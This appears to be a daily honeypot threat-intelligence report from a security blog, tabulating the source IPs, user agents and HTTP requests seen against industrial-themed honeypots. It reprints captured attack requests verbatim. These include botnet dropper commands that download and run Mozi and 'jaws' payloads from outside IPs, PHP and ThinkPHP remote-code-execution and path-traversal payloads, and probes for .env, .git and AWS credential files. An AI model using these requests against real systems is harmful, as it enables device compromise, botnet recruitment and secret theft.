Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-03-09

·2234 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-03-09
#

interaction report on http service of various Hhoneypot around the world.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
NL
NL
US
US
US
BR
US
US
NL
AR

botnet_dropper_behaviour
#

remote_addrrequest
102.46.216.1GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.129.101/jaws;chmod+777+/tmp/jaws;sh+/tmp/jaws HTTP/1.1
120.85.185.170GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
175.107.1.168GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://175.107.1.168:44567/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

list_of_source_IP_addresses
#

number_of_occurenceremote_addr
0108168.196.63.101
161172.56.151.174
25845.148.10.34
345201.98.30.238
445163.172.37.167
544172.59.161.58
63723.236.100.248
73651.158.201.156
830172.56.46.176
930172.58.240.118
102845.148.10.90
1128138.186.161.252
122751.158.202.149
132651.158.202.235
1423xxx.xxx.xxx.xxx
152295.214.53.106
1619222.223.44.122
1716164.90.229.249
1816178.128.195.215
191545.148.10.35
201046.19.140.74
21892.255.57.58
228204.76.203.18
238185.100.235.33
247154.81.156.7
25645.148.10.235
265195.178.110.163
275204.76.203.15
285208.110.70.42
295164.90.210.38
30415.204.32.65
31487.121.84.204
32493.174.93.12
333185.147.125.162
343159.89.99.204
353159.65.112.165
363198.235.24.52
372109.236.61.115
38278.153.140.203
392165.22.28.132
402159.89.25.189
412134.209.227.209
422162.142.125.221
432159.89.99.133
44264.227.123.94
452196.251.113.74
46218.217.83.24
47245.166.100.48
482134.209.237.157
4922.57.122.234
50280.82.77.202
512159.89.101.130
52146.19.138.210
531198.235.24.144
54159.126.81.234
551205.210.31.213
56152.249.35.104
571202.62.41.165
58151.158.205.47
591198.235.24.7
601220.130.183.6
611209.38.128.112
621216.218.206.69
631198.235.24.149
641199.204.96.10
651147.185.133.132
66120.29.36.140
671122.116.242.182
681185.170.144.3
69198.98.190.9
701122.116.81.92
711196.251.85.238
72164.62.197.234
731192.42.116.199
741125.229.191.118
75164.62.197.241
76164.62.197.231
771147.185.132.7
78145.138.16.107
79144.220.185.109
801198.235.24.185
81159.127.44.65
821147.185.132.5
83120.221.68.89
84157.129.64.237
85135.203.211.210
86149.213.251.121
87159.126.159.26
881109.236.61.95
891102.46.216.1
90134.76.203.56
911196.251.85.250
92118.188.255.68
931120.85.185.170
94120.150.207.74
951175.107.1.168
961198.235.24.103

user_agent
#

number_of_occurenceuser_agent
0131Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Mobile Safari/537.36
1112-
2104Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
386Custom-AsyncHttpClient
477l9explore/1.2.2
545Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15
641Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
739Mozilla/5.0 (iPhone; CPU iPhone OS 18_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Mobile/15E148 Safari/604.1
831Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
929Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
1027Mozilla/5.0 (iPhone; CPU iPhone OS 18_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Mobile/15E148 Safari/604.1 Ddg/18.3
1126Hello World
1217Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
1311Go-http-client/1.1
1410l9tcpid/v1.1.0
1510Hello World/1.0
1610Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)
178Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
188curl/7.88.1
197Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
205Mozilla/5.0 zgrab/0.x
215Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com
225Mozilla/5.0 (compatible)
234Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
243Xpanse, a Palo Alto Networks company, indexes customer network perimeters. If you have any questions or concerns, please reach out to: scaninfo@paloaltonetworks.com.
253Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 YaBrowser/24.10.0.0 Safari/537.36
262Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
272Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
282Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
291masscan/1.3 (https://github.com/robertdavidgraham/masscan)
301Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36
311xfa1
321Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
331Mozilla/5.0 (Linux; Android 10; MI 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
341Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/53.0.3023.67 Safari/537.32
351Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2
361Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
371Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
381Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Maxthon/5.2.7.5000
391Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
401Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
411Mozilla/5.0 (compatible; ModatScanner/1.0; +https://modat.io/)
421Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Mobile Safari/537.36 Edge/12.0
431Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
441fasthttp
451Hello, world
461python-requests/2.32.3
471Opera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1
481Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4

request
#

number_of_occurencerequest
0114GET / HTTP/1.1
141POST /FormLogin HTTP/1.1
223POST /login.html HTTP/1.0
321GET / HTTP/1.0
419GET /favicon.ico HTTP/1.1
518GET /css/bootstrap.min.css HTTP/1.1
615GET /Module1/js/Module_2o6q5no3oqp65504359524o2150s4333.js HTTP/1.1
715GET /Module1/js/Home_9b5766a815f5416da1d14b6622620932.js HTTP/1.1
815GET /css/elementsDesktop.css HTTP/1.1
915GET /js/mainControllers.js HTTP/1.1
1015GET /js/mainControllersUtils.js HTTP/1.1
1115GET /js/jquery.min.js HTTP/1.1
1215GET /js/bootstrap.min.js HTTP/1.1
1315GET /socket.io/socket.io.js HTTP/1.1
1415GET /js/moment.min.js HTTP/1.1
1515GET /js/jquery.mask.min.js HTTP/1.1
1615GET /css/rcError.css HTTP/1.1
1715GET /css/ui.jqgrid.min.css HTTP/1.1
1815GET /css/fonts.css HTTP/1.1
1915GET /css/jquery-ui.css HTTP/1.1
2015GET /css/style.css HTTP/1.1
2114GET /Media/Images/F81B47A3.PNG HTTP/1.1
2214GET /Fonts/Vera.woff HTTP/1.1
2314GET /Fonts/VeraBd.woff HTTP/1.1
2414GET /Media/Images/1801359D.PNG HTTP/1.1
2514GET /Media/Images/BF8AD73A.PNG HTTP/1.1
2614GET /Media/Images/N3P3R87R.png HTTP/1.1
275GET /i HTTP/1.1
285GET /restore.php HTTP/1.1
294GET /Fonts/VeraBI.woff HTTP/1.1
304GET /cgi-bin/luci/;stok=/locale HTTP/1.1
314GET /ban.php HTTP/1.1
324GET /Fonts/VeraIt.woff HTTP/1.1
333GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
343GET /.env HTTP/1.1
353GET /login.html HTTP/1.1
363\x16\x03\x02\x01o\x01\x00\x01k\x03\x02RH\xC5\x1A#\xF7:N\xDF\xE2\xB4\x82/\xFF\x09T\x9F\xA7\xC4y\xB0h\xC6\x13\x8C\xA4\x1C=\x22\xE1\x1A\x98 \x84\xB4,\x85\xAFn\xE3Y\xBBbhl\xFF(=’:\xA9\x82\xD9o\xC8\xA2\xD7\x93\x98\xB4\xEF\x80\xE5\xB9\x90\x00(\xC0
372GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
382GET /media../.git/config HTTP/1.1
392GET /.env.prod HTTP/1.1
402GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
412GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
422GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
432GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
442GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
452GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
462GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1
472GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
482GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
492GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
502GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
512GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
522GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
532GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
542GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
552GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
562GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1
572GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
582GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
592GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
602GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
612GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
622GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
632GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
642GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
652POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
662POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
672GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
682GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
692GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
702GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
712GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
722GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php HTTP/1.1
732GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1
742GET /containers/json HTTP/1.1
752GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1
762GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
772GET /solr/admin/info/system HTTP/1.1
782GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1
792GET /server/.git/config HTTP/1.1
802\x16\x03\x00\x00S\x01\x00\x00O\x03\x00?G\xD7\xF7\xBA,\xEE\xEA\xB2`~\xF3\x00\xFD\x82{\xB9\xD5\x96\xC8w\x9B\xE6\xC4\xDB<=\xDBo\xEF\x10n\x00\x00(\x00\x16\x00\x13\x00
812POST /sdk HTTP/1.1
822GET /v2/_catalog HTTP/1.1
832GET /www/.git/config HTTP/1.1
842GET /.env.backup HTTP/1.1
852GET /static../.git/config HTTP/1.1
862GET /prod/.env HTTP/1.1
872GET /login.rsp HTTP/1.1
882OPTIONS / HTTP/1.0
892OPTIONS / RTSP/1.0
902l\x00\x0B\x00\x00\x00\x00\x00\x00\x00\x00\x00
912GET /.git/config HTTP/1.1
922GET /.env.dev.local HTTP/1.1
932GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
942GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1
952GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
962GET /css/star-empty.svg HTTP/1.1
972GET /bin.sh HTTP/1.1
982GET /.env.staging.local HTTP/1.1
992GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
1002GET /.env.config HTTP/1.1
1012HEAD / HTTP/1.1
1022GET /docker-compose.prod.yml HTTP/1.1
1032HELP
1042\x80\x00\x00(r\xFE\x1D\x13\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xA0\x00\x01\x97
1052\x00\x1E\x00\x06\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x07version\x04bind\x00\x00\x10\x00\x03
1062\x00\x0C\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00
1072GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1
1082GET /cgi-bin/authLogin.cgi HTTP/1.1
1092GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1102GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1112POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
1121GET /socket.io/1/?t=1741558695879 HTTP/1.1
1131GET /wp-content/ HTTP/1.1
1141\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x8D\xE1
1151GET /.env.production HTTP/1.1
1161GET /assets../.git/config HTTP/1.1
1171GET /configuration/.env HTTP/1.1
1181GET /api/.env HTTP/1.1
1191GET /socket.io/1/?t=1741556667347 HTTP/1.1
1201POST /Autodiscover/Autodiscover.xml HTTP/1.1
1211GET /oops/Kloki.mpsl HTTP/1.1
1221GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://175.107.1.168:44567/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1231GET /.env.secret HTTP/1.1
1241\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03\x1ATT\x07jBn\xD5h\xE1C\x18l\xC0\xE2S30\x90X}:\xF9\xA6*\x9E\x91\x9E\xAB\xAD\xF2A \xCF\x95V\x82\x84+\xB3\xC6\x90\x09v\xFB\x89t\x12\xBDgT\xBE\xBB\xE1\xA7\xC8\x10\xB2r&]\x9C4\x17\x88\x00\x1A\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
1251GET /geoserver HTTP/1.1
1261\x16\x03\x01\x01\xAA\x01\x00\x01\xA6\x03\x036\xB7K\x01\xED\xB6!\x99s\x05
1271POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1281\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xD5\xC0D\xE2.X\xEA_\xC4\xAE5\xDD.#\xD3yA3\xBE\xB3\x87rx\xAC\xF2\x8Dr\x0E\xC8
1291GET /build_tool/.git/config HTTP/1.1
1301GET /app/resources/.git/config HTTP/1.1
1311GET http://xxx.xxx.xxx.xxx:80/db/scripts/setup.php HTTP/1.0
1321GET http://xxx.xxx.xxx.xxx:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0
1331GET http://xxx.xxx.xxx.xxx:80/_phpMyAdmin/scripts/setup.php HTTP/1.0
1341GET http://xxx.xxx.xxx.xxx:80/webdb/scripts/setup.php HTTP/1.0
1351GET http://xxx.xxx.xxx.xxx:80/phpma/scripts/setup.php HTTP/1.0
1361GET http://xxx.xxx.xxx.xxx:80/dbadmin/scripts/setup.php HTTP/1.0
1371GET http://xxx.xxx.xxx.xxx:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0
1381GET http://xxx.xxx.xxx.xxx:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0
1391GET http://xxx.xxx.xxx.xxx:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0
1401GET http://xxx.xxx.xxx.xxx:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0
1411GET http://xxx.xxx.xxx.xxx:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0
1421GET /tmp/.env HTTP/1.1
1431\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x93R\x88!\xB4\xF8\x8D\xD0\xEA\xDA\xD8M\xB5\x1A\x0F\x7F?\x92ljw\xBB\xC7\xC7\xE7n\xE4\xB7\xBF\x8F$+ \xFC\xB5\xF8\xCD\xE57\xEA\xE6\xBD\xE8\xE6\xE9B\xCD\xB6\x0Eu\xFD%c\xB10\x1D\xED\x10\xE9W\x1D/\x1DrT\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
1441GET http://xxx.xxx.xxx.xxx:80/MyAdmin/scripts/setup.php HTTP/1.0
1451GET http://xxx.xxx.xxx.xxx:80/pma/scripts/setup.php HTTP/1.0
1461GET http://xxx.xxx.xxx.xxx:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0
1471GET http://xxx.xxx.xxx.xxx:80/phpmyadmin/scripts/setup.php HTTP/1.0
1481GET /socket.io/1/?t=1741492390538 HTTP/1.1
1491MGLNDD_xxx.xxx.xxx.xxx_80
1501\x16\x03\x01\x00{\x01\x00\x00w\x03\x03IA\x14/v\x8CY&\xCA\xBB+\xE8Ng\xA6\x93\x7F\x16\xAD\xCC0{>M\xA2]\xE4#\x1BD\xCEG\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
1511\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03\x90\xAC\x95\xDC\xFE\x90t\x1C?6xQ\x86\xFC\x1B\xAE\x91\xAF:\xF9l\xDA\xC0H\xAB\xF5\xDC\xF8b\x02\xAD~\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
1521\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xA9\xD0\xB7\xF9\xCD9O\xFA\x01\xBB\x01#\x8C\xAB\xD6\xE9\xE7:\xD7\x1AA\x99\xB4ss\xB46\x03Q\xC1\x15z u\xF7\xDB%\xC8\x18\x8B\xC7\x0CqtI2\x0C\x90\xC9G\x1F_Za\x8E&\x17\xE2\x80\xA0U\x00\xD3\x93\xBB\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
1531\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03}7\x8A\x1A\xA8z\x87Fh\x9F\xEE\x82\xF8\xB5\xB1\xB6\xB4\x94+\x91\x83\xFA\x9C\xB1\xB0FI\xD6\x1A
1541GET /socket.io/1/?t=1741487809723 HTTP/1.1
1551GET /socket.io/1/?t=1741487785079 HTTP/1.1
1561GET /socket.io/1/?t=1741487762922 HTTP/1.1
1571GET /socket.io/1/?t=1741487734249 HTTP/1.1
1581GET /admin/config.php HTTP/1.0
1591GET /users/login HTTP/1.1
1601GET /users/users/login HTTP/1.1
1611GET /users/users/users/login HTTP/1.1
1621GET /users/users/users/favicon.ico HTTP/1.1
1631GET /user_panel/.git/config HTTP/1.1
1641GET /project/frontend/.git/config HTTP/1.1
1651\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xA9k\x94hxF\x5CFz\x8EM\x14\xA1\xEE\x82\x83\xC7Mg\x8E\x8F\x88\xA9\x9A\xA3edf\xDB\xEF_\x06 \x8D\xC2\x00[’\x95\xA2\xA5H8\xE8q:\x01\xFC\x0C\x12!\xDE\xE0~\x87\xCAalV\xBDr\xEE\x9E\xD9@\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
1661GET /.env.tmp HTTP/1.1
1671GET /socket.io/1/?t=1741510402643 HTTP/1.1
1681GET /socket.io/1/?t=1741514902918 HTTP/1.1
1691\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xE3\xC4\x98\xD4Q\xEDR!\x97\xB7\xB5\x932AWL\xDErX\xC2\xC8~V\x06\x1Ad\x09\x97\x85\xA6 \x84\xE5O\x82d\x8C\x8A`9vW\x5C\x8B\x80^~Q6\xBB\xB5Ke\xCA\xCB\xCDaoY\xD03\xC4\x98\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
1701GET /releases/.git/config HTTP/1.1
1711\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03%0\x87\x94r<n\xB08x \x93\xEE\xD4\xA3L;d\xF2\xD4\xC0_7\xA6<>\x7F\xCE\xBD5gg \x88\xD4/\xE2\xA0\xCA\x9F\xA7\xC4\xC4\x0B\x9A\xB6\x10\xDF5\xC3\x9DL\x18\xD2\x87\xE6\x1F4\xFE\xC6\xF6zy\x8Dq\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
1721GET /socket.io/1/?t=1741518100629 HTTP/1.1
1731GET http://httpbin.org/ip HTTP/1.1
1741\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr
1751GET http://xxx.xxx.xxx.xxx:80/mysqlmanager/scripts/setup.php HTTP/1.0
1761GET /Odin/http/call1741520303 HTTP/1.1
1771GET /OdinHttpCall1741520303 HTTP/1.1
1781GET /odinhttpcall1741520303 HTTP/1.1
1791\x16\x03\x01\x00\xC7\x01\x00\x00\xC3\x03\x03X\x1E\xBE\xDA\xAE\x01\xDB)75i\xB0qA\x17g9\xB3\x9B\xFE@#c\x00\xB4K\xAEh\xF2\xC8\xE8\x13\x00\x00P\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
1801\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03B\x80x\x99z\xF6\x0B6\xCF\x12%
1811\x16\x03\x01\x01$\x01\x00\x01 \x03\x03g\xEE\x97NO\x86S\xD8\x92\xE2g\xDB\xC7\x01\xAD,U\xF54\xB1\x8Cq\xBA\xFD\xBATn\xDD5\xE7\xBB\xC7 \xD6\xF7\x97\xB2\xDE\xE1\x1CIHj\xF4\x22
1821\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03aU\x0C\x1D\x9C\xD8\x0E\xA6\x5Cw_\x93@\x84\xB7\x1E\xC1\xBE\xB3\x85\xB6<\xB916r\x5CezW\x00\x15 \x99\xC2\xCD\x91t
1831GET /odinhttpcall1741528066 HTTP/1.1
1841GET /OdinHttpCall1741528066 HTTP/1.1
1851GET /Odin/http/call1741528066 HTTP/1.1
1861GET /actuator/health HTTP/1.1
1871\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03V<\xD9#Fr\x01g\x1A2\xCB\x8D\x01-\x9D\xF2\xAC\x91?T\x00\xE8\x04\xDC\xC1k\x89jGvz\xB8 O9\x00\xBB\x14\x12\xDC\xF9j\xAF]pU\xA9\xBD\xBA5\xE1\xAEW\xD3h
1881GET http://xxx.xxx.xxx.xxx:80/mysql-admin/scripts/setup.php HTTP/1.0
1891GET http://xxx.xxx.xxx.xxx:80/phpmanager/scripts/setup.php HTTP/1.0
1901GET http://xxx.xxx.xxx.xxx:80/phpmy-admin/scripts/setup.php HTTP/1.0
1911\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x0B\xB5w\xD8\x9F\xCD\x844\xE6:eeV\xAD~\x9D\xE6\x807\xB5\xCEGm\xD7\xB7\xED\x07\xFB\xCBx7\xDF \xF7n\x7F\x0C\xEB\xEA*\xA4\xBB.\x02\xDA\xD4R\xAC\x00\x85#\xDF\xF7\xA4\xE3\xAFd\xA5P\x0E\x18]\xFB/\xBE\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
1921GET /.env.orig HTTP/1.1
1931GET /geoserver/web/ HTTP/1.1
1941\x00\x0E8R
1951\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xE3).\xAB\x0E\xB4\x1A\xFCb\xDF\x14\x22\x9A \xFE\xA0s\xF6\xE5\xAD3’Bl\xAFj\xC2\xE5oO\x0F\xD5 \xF2\x16\xA9D\xEEU5\x10)\xAC
1961GET /data/private/.git/config HTTP/1.1
1971GET /app/frontend/.git/config HTTP/1.1
1981GET /user/.git/config HTTP/1.1
1991\x16\x03\x01\x00\xC7\x01\x00\x00\xC3\x03\x03\xA1`3\x89\xECn\x0C\xF6i+\xF9\xC1\xE0\x09\xD6N\x02d\x84)\x0Eh\x8E
2001\x16\x03\x01\x01$\x01\x00\x01 \x03\x03
2011\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03*\xBD<\xFE\x953\x14\x08\xED\x95\xC6\x04\xEC\xF4
2021GET /socket.io/1/?t=1741533429715 HTTP/1.1
2031\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF1\x03%\x00\x00\x00{ \x22Ret\x22 : 100, \x22SessionID\x22 : \x220x0\x22 }
2041GET /js/jquery-ui.mainControllers.js HTTP/1.1
2051GET /socket.io/1/?t=1741542965961 HTTP/1.1
2061GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2071GET /socket.io/1/?t=1741543966856 HTTP/1.1
2081GET /socket.io/1/?t=1741544069251 HTTP/1.1
2091GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.129.101/jaws;chmod+777+/tmp/jaws;sh+/tmp/jaws HTTP/1.1
2101GET /login/signin.css HTTP/1.1
2111GET /socket.io/1/?t=1741547486384 HTTP/1.1
2121GET /css/spacer.gif HTTP/1.1
2131GET /css/star-full.svg HTTP/1.1
2141GET /portal/redlion HTTP/1.1
2151GET /socket.io/1/?t=1741553011007 HTTP/1.1
2161GET /socket.io/1/?t=1741553788383 HTTP/1.1
2171\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x032\xDB\x86\xC6\x8F\xCA\xA7\xF2\xFC\xAD]\xBD\x98\x8E#\x93\x09\x0C\xD6\xA0\xD3\xFE\xF5t\xC0z\xBE\xC2\xE7\xE0\x83\x15 \xE0\xB0f\xB4;\xFF\xF1 Q\xC1\xDE\xDF\x8A\x92\x12\xAD\xA7\x0E^\x82\xF3\xB5\x81\xFE\xC8\xC3\xB1\x90\x7F\x80@V\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
2181GET /dev/.git/config HTTP/1.1
2191GET /.aws/credentials HTTP/1.1
2201GET /.env.ci HTTP/1.1
2211GET /.env.live HTTP/1.1
